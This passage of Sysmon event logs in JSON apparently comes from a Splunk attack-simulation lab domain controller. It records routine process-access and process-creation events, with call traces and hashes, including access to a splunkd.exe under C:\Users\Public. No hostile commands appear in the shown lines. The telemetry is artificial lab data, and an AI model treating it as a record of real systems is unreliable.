06:53:57.879","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4516,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:57.879\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1185-5F25-0000-001048360600}\r\nTargetProcessId: 4908\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:57.879","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1185-5F25-0000-001048360600}","TargetProcessId":"4908","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:53:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:58","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4517,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:58.505\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3588\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:58.505","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3588","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:53:59","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4518,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:59.037\r\nProcessGuid: {E2A3D6B1-1187-5F25-0000-00103D380600}\r\nProcessId: 3356\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:53:59.037","ProcessGuid":"{E2A3D6B1-1187-5F25-0000-00103D380600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 06:54:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4519,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:59.036\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1187-5F25-0000-00103D380600}\r\nTargetProcessId: 3356\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:59.036","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1187-5F25-0000-00103D380600}","TargetProcessId":"3356","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4520,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:59.036\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1187-5F25-0000-00103D380600}\r\nTargetProcessId: 3356\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:59.036","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1187-5F25-0000-00103D380600}","TargetProcessId":"3356","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:54:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4521,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:59.036\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:59.036","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4522,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:59.036\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:59.036","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:53:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4523,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:53:59.036\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:53:59.036","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:54:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
